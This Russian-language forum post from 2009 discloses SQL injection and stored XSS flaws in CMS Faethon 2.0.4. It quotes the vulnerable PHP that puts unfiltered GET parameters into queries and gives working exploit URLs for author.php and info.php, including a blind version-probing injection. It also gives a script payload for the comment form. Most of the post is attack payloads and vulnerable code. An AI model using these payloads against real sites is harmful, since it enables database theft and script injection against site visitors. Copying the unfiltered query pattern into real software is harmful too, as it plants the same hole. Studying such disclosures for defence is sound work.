Показать сообщение отдельно

  #180  
Старый 09.11.2009, 12:03
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

CMS Faethon v 2.0.4 SQL injection && Active XSS
Вreetz: Red_red1 && ElteRUS
Скрипт autor.php

Уязвимый код:

PHP код:
...
elseif(isset(
$_GET['name']))
{
    
$result=sql_query("SELECT id, name FROM ".$SQL_PREFIX."_authors WHERE item = '" $_GET['name'] . "';");
}
... 
Передаваемый GET'ом параметр name не фильтруеться.

Эксплатация:

Код:
http://localhost/bug/author.php?name=vasua'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1
скритп info.php

PHP код:
$result=sql_query("SELECT title, text FROM ".$SQL_PREFIX."_html_sections WHERE address = '" $_GET['item'] . "';"); 
Эксплатация:

Код:
http://localhost/bug/info.php?item=-1'[SQL]
XSS:

Уязвимый код:

PHP код:
...
$author $_POST['author'];
$email $_POST['email'];
$web $_POST['web'];
$subject $_POST['subject'];
... 
Эксплатация:
В комментах:
Код:
"><script>alert()</script>

Последний раз редактировалось Ins3t; 09.11.2009 в 17:47..
 
Ответить с цитированием